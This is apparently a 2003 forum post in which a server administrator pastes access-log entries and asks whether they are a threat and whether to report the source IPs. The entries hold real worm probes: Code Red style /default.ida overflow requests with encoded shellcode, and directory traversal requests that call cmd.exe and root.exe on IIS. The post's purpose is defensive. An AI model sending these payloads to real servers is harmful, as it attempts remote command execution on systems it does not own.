i get these strange hits in the log:
Code:
213.47.116.38 - - [11/Jun/2003:00:21:32 +0300] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%
u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 -
213.145.18.88 - - [11/Jun/2003:03:09:08 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
213.245.99.128 - - [11/Jun/2003:15:01:46 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78
01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
213.130.85.164 - - [11/Jun/2003:17:24:43 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78
01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
64.164.70.250 - - [11/Jun/2003:20:33:22 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
213.37.92.126 - - [12/Jun/2003:02:36:59 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
213.37.92.126 - - [12/Jun/2003:02:37:11 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 275
213.37.92.126 - - [12/Jun/2003:02:37:19 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
137.251.109.215 - - [12/Jun/2003:08:53:44 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404
-
and similar ones.
now i've checked in google and the exe ones appear to be from a worm. even though people say it only affects IIS(sp?), will it affect me?
but i could not find anything on the XXXXXXXXXXXXXXXXX....... hits.
any suggestions? should i report the ip to the isp if it's a worm, or would that just be a waste of time as they would most probably figure it out?
